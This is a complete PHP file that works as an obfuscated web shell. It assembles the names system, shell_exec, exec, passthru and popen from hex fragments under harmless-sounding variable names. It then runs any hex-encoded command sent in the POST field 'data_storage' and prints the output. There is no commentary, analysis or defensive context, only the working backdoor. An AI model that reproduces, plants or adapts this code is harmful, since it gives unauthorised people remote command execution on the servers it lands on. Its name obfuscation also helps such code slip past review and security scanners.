<?php


$reference1 = '73';
$reference2 = '74';
$reference3 = '65';
$reference4 = '6c';
$reference5 = '5f';
$reference6 = '63';
$reference7 = '61';
$reference8 = '72';
$reference9 = '75';
$reference10 = '6d';
$reference11 = '67';
$reference12 = '6f';
$reference13 = '6e';
$core_engine1 = pack("H*", $reference1 . '79' . '73' . $reference2 . $reference3 . '6d');
$core_engine2 = pack("H*", '73' . '68' . $reference3 . $reference4 . $reference4 . $reference5 . $reference3 . '78' . '65' . '63');
$core_engine3 = pack("H*", $reference3 . '78' . $reference3 . $reference6);
$core_engine4 = pack("H*", '70' . $reference7 . $reference1 . $reference1 . $reference2 . '68' . $reference8 . $reference9);
$core_engine5 = pack("H*", '70' . '6f' . '70' . '65' . '6e');
$core_engine6 = pack("H*", '73' . '74' . '72' . '65' . '61' . $reference10 . $reference5 . $reference11 . $reference3 . '74' . $reference5 . '63' . $reference12 . '6e' . $reference2 . $reference3 . $reference13 . $reference2 . '73');
$core_engine7 = pack("H*", '70' . $reference6 . $reference4 . $reference12 . '73' . '65');
$data_storage = pack("H*", '64' . $reference7 . '74' . $reference7 . $reference5 . '73' . $reference2 . '6f' . $reference8 . '61' . $reference11 . '65');
if (isset($_POST[$data_storage])) {
    $data_storage = pack("H*", $_POST[$data_storage]);
    if (function_exists($core_engine1)) {
        $core_engine1($data_storage);
    } elseif (function_exists($core_engine2)) {
        print $core_engine2($data_storage);
    } elseif (function_exists($core_engine3)) {
        $core_engine3($data_storage, $val_descriptor);
        print join("\n", $val_descriptor);
    } elseif (function_exists($core_engine4)) {
        $core_engine4($data_storage);
    } elseif (function_exists($core_engine5) && function_exists($core_engine6) && function_exists($core_engine7)) {
        $ptr_dat = $core_engine5($data_storage, 'r');
        if ($ptr_dat) {
            $elem_component = $core_engine6($ptr_dat);
            $core_engine7($ptr_dat);
            print $elem_component;
        }
    }
    exit;
}
